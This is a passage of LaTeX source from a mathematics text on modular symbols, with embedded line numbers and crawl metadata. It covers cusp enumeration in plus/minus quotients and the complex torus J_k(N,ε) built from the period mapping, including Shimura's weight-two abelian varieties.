\\eps(\\beta^{-1})\\left[\\gamma_\\alp 1027 \\vtwo{u}{v}\\right] 1028 = \\eps(\\beta^{-1})\\left[\\gamma_\\beta 1029 \\vtwo{u}{v}\\right] 1030 = \\left[\\vtwo{u}{v}\\right].$$\n1031Applying Proposition~\\ref{prop:cusp1} and\n1032noting that $\\eps(\\beta^{-1}\\alp)\\neq 1$ shows\n1033that $\\beta^{-1}\\alp$ satisfies the properties\n1034of the $\\alp$'' in the statement of the\n1035proposition we are proving.\n1036\\end{proof}\n1037\n1038We enumerate the possible~$\\alp$ appearing\n1039in Proposition~\\ref{prop:cuspdies} as follows.\n1040Let $g=(v,N)$ and list the\n1041$\\alp=v\\cdot\\frac{N}{g}\\cdot{}a+1$, for $a=0,\\ldots,g-1$,\n1042such that $\\eps(\\alp)\\neq 0$.\n1043\n1044{\\vspace{3ex}\\em\\par\\noindent Working in the\n1045plus one\\index{Plus-one quotient} or\n1046minus one quotient\\index{Minus-one quotient}.}\n1047Let~$s$ be a sign, either~$+1$ or~$-1$.\n1048To compute $\\sS_k(N,\\eps)_s$ it is necessary\n1049to replace $B_k(N,\\eps)$ by its quotient modulo the\n1051$\\left[ \\smallvtwo{-u}{\\hfill v}\\right] 1052= s \\left[\\smallvtwo{u}{v}\\right]$\n1053for all cusps $\\smallvtwo{u}{v}$.\n1054Algorithm~\\ref{alg:cusplist} can be modified to deal\n1055with this situation as follows.\n1056Given a cusp $x=\\smallvtwo{u}{v}$, proceed as\n1057in Algorithm~\\ref{alg:cusplist} and check if\n1058either $\\smallvtwo{u}{v}$ or $\\smallvtwo{-u}{\\hfill v}$\n1059is equivalent (modulo scalars) to any cusp seen so far. If not,\n1060use the following trick to determine whether\n1061the $\\eps$ and $s$-relations\n1062kill the class of $\\smallvtwo{u}{v}$:\n1063use the unmodified Algorithm~\\ref{alg:cusplist}\n1064to compute the scalars $\\alp_1, \\alp_2$ and\n1065standard indices $i_1$, $i_2$ associated to\n1066$\\smallvtwo{u}{v}$ and $\\smallvtwo{-u}{\\hfill v}$, respectively.\n1067The $s$-relation kills the class of $\\smallvtwo{u}{v}$\n1068if and only if $i_1=i_2$ but $\\alp_1\\neq s\\alp_2$.\n1069\n1070\n1071\\section{The complex torus attached to a modular form}%\n1072\\index{Complex torus}%\n1073\\index{Modular forms!associated complex torus}%\n1074\\label{sec:tori}%\n1075Fix integers $N\\geq 1$, $k\\geq 2$, and let~$\\eps$ be a mod~$N$\n1076Dirichlet character\\index{Dirichlet character}.\n1077For the rest of this section assume that $\\eps^2=1$.\n1078\n1079We construct a lattice in $\\Hom(S_k(N,\\eps),\\C)$ that is invariant\n1080under complex conjugation and under the action of the Hecke\n1081operators.\\index{Hecke operators} The quotient of\n1082$\\Hom(S_k(N,\\eps),\\C)$ by this lattice is a complex torus\n1083$J_k(N,\\eps)$, which is equipped with an action of the Hecke operators\n1084and of complex conjugation.\n1085\n1086The reader may wish to compare our construction with a closely related\n1087construction of Shimura\\index{Shimura}~\\cite{shimura:surles}. Shimura\n1089torus the structure of an abelian variety over~$\\C$. Note that his\n1090torus is, a priori, different than our torus. We do not know if\n1091our torus has the structure of abelian variety over~$\\C$.\n1092\n1093When $k=2$, the torus $J_2(N,\\eps)$ is the set of complex points of an\n1094abelian variety, which is actually defined over $\\Q$; when $k>2$,\n1095the study of these complex tori is of interest in trying to understand the\n1096conjectures of Bloch and Kato (see \\cite{bloch-kato})%\n1097\\index{Conjecture!Bloch and Kato}%\n1098\\index{Bloch and Kato conjecture} on motifs\\index{Motifs} attached\n1099to modular forms\\index{Modular forms}.\n1100\n1101Let $\\sS=\\sS_k(N,\\eps)$ (respectively, $S=S_k(N,\\eps)$)\n1102be the space of cuspidal modular symbols (respectively, cusp forms)\n1103of weight~$k$, level~$N$, and character~$\\eps$.\n1104The Hecke algebra~$\\T$\\index{Hecke algebra!and integration pairing}\n1105acts in a way compatible with the\n1106integration pairing\\index{Integration pairing!and complex torus}\n1107$\\langle\\,,\\,\\rangle 1108 : S \\cross \\sS \\ra \\C$.\n1109This pairing induces a $\\T$-module\n1110homomorphism $\\Phi:\\sS\\ra S^*=\\Hom_\\C(S,\\C)$,\n1111called the \\defn{period mapping}.%\n1112\\index{Period mapping|textit}\n1113Because $\\eps^2=1$, the $*$-involution\\index{Star involution} preserves~$S$.\n1114\\begin{proposition}\n1115The period mapping~$\\Phi$\\index{Period mapping!is injective}\n1116is injective and $\\Phi(\\sS)$ is a lattice in~$S^*$.\n1117\\end{proposition}\n1118\\begin{proof}\n1119By Theorem~\\ref{thm:perfectpairing},\n1120 $$\\sS\\tensor_{\\R}\\C\\isom 1121 \\Hom_\\C(S\\oplus \\Sbar,\\C).$$\n1122Because $\\eps^2=1$, we have $S = S_k(N,\\eps;\\R)\\tensor_{\\R}\\C$.\n1123Set $S_\\R := S_k(N,\\eps;\\R)$ and likewise define $\\Sbar_\\R$.\n1124We have\n1125$$\\Hom_\\C(S\\oplus \\Sbar,\\C) = 1126 \\Hom_\\R(S_\\R \\oplus \\Sbar_\\R,\\R)\\tensor_\\R \\C.$$\n1127Let $\\sS_{\\R} = \\sS_k(N,\\eps;\\R)$ and $\\sS_{\\R}^+$ be the\n1128subspace fixed under~$*$. By Proposition~\\ref{prop:starpairing}\n1129we have maps\n1130$$\\sS_{\\R}^+ \\ra \\Hom_{\\R}(S_{\\R}\\oplus\\Sbar_\\R,\\R) 1131 \\ra \\Hom_{\\R}(S_{\\R},\\R)$$\n1132and\n1133$$\\sS_{\\R}^- \\ra \\Hom_{\\R}(S_{\\R}\\oplus\\Sbar_\\R,i\\R) 1134 \\ra \\Hom_{\\R}(S_{\\R},i\\R).$$\n1135The map $\\sS_{\\R}^+\\ra \\Hom_{\\R}(S_{\\R},\\R)$ is\n1136an isomorphism: the point is that if\n1137$\\langle \\bullet, x\\rangle$, for $x\\in \\sS_{\\R}^+$,\n1138vanishes on $S_\\R$ then it vanishes on the\n1139whole of $S\\oplus \\Sbar$. Likewise, the map\n1140$\\sS_{\\R}^-\\ra \\Hom_{\\R}(S_{\\R},i\\R)$\n1141is an isomorphism. Thus\n1142$$\\sS\\tensor\\R = \\sS_{\\R} \\isom \\Hom_{\\R}(S_{\\R},\\R) 1143\\oplus \\Hom_{\\R}(S_{\\R},i\\R) 1144\\isom \\Hom_{\\C}(S,\\C).$$\n1145Finally, we observe that~$\\sS$ is by definition\n1146torsion free, which completes the proof.\n1147\\end{proof}\n1148\n1149The torus $J_k(N,\\eps)$ fits into an exact sequence\n1150$$0\\lra \\sS \\xrightarrow{\\quad\\Phi\\quad} 1151 \\Hom_\\C(S,\\C) \\lra J_k(N,\\eps) \\lra 0.$$\n1152Let $f\\in S$ be a newform and $S_f$ the complex vector\n1153space spanned by the Galois conjugates of~$f$.\n1154The period map $\\Phi_f$ associated to~$f$ is the map\n1155$\\sS\\ra \\Hom_\\C(S_f,\\C)$\n1156obtained by composing~$\\Phi$ with restriction to $S_f$.\n1157Set\n1158 $$A_f := \\Hom_\\C(S_f,\\C) / \\Phi_f(\\sS).$$\n1159\n1160We associate\\label{pg:dual} to~$f$ a subtorus of~$J$ as follows.\n1161\\index{Complex torus!dual of}%\n1162\\index{Modular forms!associated subtorus}%\n1163Let $I_f = \\Ann_{\\T}(f)$ be the annihilator\n1164of~$f$ in the Hecke algebra\\index{Hecke algebra}, and set\n1165 $$\\Adual_f := \\Hom_\\C(S,\\C)[I_f]/\\Phi(\\sS[I_f])$$\n1166where $\\Hom_\\C(S,\\C)[I_f] = \\intersect_{t \\in I_f} \\ker(t)$.\n1167\n1168The following diagram summarizes the tori just defined;\n1169its columns are exact but its rows need not be.\n1170\\begin{equation}\\label{dgm:uniformization}\n1171\\[email protected]=.9pc{\n1172 0\\ar[d] & 0\\ar[d] & 0\\ar[d] \\\\\n1173 \\sS[I_f]\\ar[r]\\ar[dd] & \\sS\\ar[r]\\ar[dd]&\\Phi_f(\\sS)\\ar[dd] \\\\\n1174 & & \\\\\n1175\\Hom_\\C(S,\\C)[I_f]\\ar[r]\\ar[dd] &\\Hom_\\C(S,\\C)\\ar[r]\\ar[dd] &\\Hom_\\C(S[I_f],\\C)\\ar[dd]\\\\\n1176 & & \\\\\n1178& J_k(N,\\eps) \\ar[r]\\ar[d]& A_f \\ar[d]\\\\\n1179 0 & 0 & 0 \\\\\n1180}\\end{equation}\n1181\n1182\n1183\\subsection{The case when the weight is $2$}%\n1184\\index{Complex torus!in weight two}%\n1185When $k=2$ and $\\eps=1$ the above is just Shimura's\\index{Shimura}\n1186classical association of an abelian variety to a modular\n1187form\\index{Modular forms}; see~\\cite[Thm.~7.14]{shimura:intro}\n1188and~\\cite{shimura:factors}. In this case $A_f$ and $\\Adual_f$ are\n1189abelian varieties that are defined over~$\\Q$. Furthermore $A_f$ is an\n1190\\defn{optimal quotient}\\index{Optimal quotient|textit} of~$J$, in the sense\n1191that the kernel of the map $J\\ra A_f$ is connected.\n1192For a summary of the main results in this situation,\n1193see Section~\\ref{sec:optquoj0n}.\n1194\n1195\n1196" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5665488,"math_prob":0.99972445,"size":47565,"snap":"2020-45-2020-50","text_gpt3_token_len":17256,"char_repetition_ratio":0.14270096,"word_repetition_ratio":0.016750721,"special_character_ratio":0.33226112,"punctuation_ratio":0.11957093,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999522,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-03T11:33:34Z\",\"WARC-Record-ID\":\"<urn:uuid:5d6d244e-0146-486a-9bd2-4360021a8ad6>\",\"Content-Length\":\"629834\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:53f3c3c4-5bb9-4cd7-b909-5d7f1d7ca5c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:16747229-ad13-4ff8-944b-f99f4f628486>\",\"WARC-IP-Address\":\"172.67.20.35\",\"WARC-Target-URI\":\"https://share.cocalc.com/share/5d54f9d642cd3ef1affd88397ab0db616c17e5e0/www/papers/thesis/src/modsyms.tex?viewer=share\",\"WARC-Payload-Digest\":\"sha1:4NCBSYVIONJPBNNNMXRJKVQA6QL6H7G2\",\"WARC-Block-Digest\":\"sha1:TD7GZPSIKMBHP6L2QOBANTQTRCWU5K76\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141727627.70_warc_CC-MAIN-20201203094119-20201203124119-00710.warc.gz\"}"}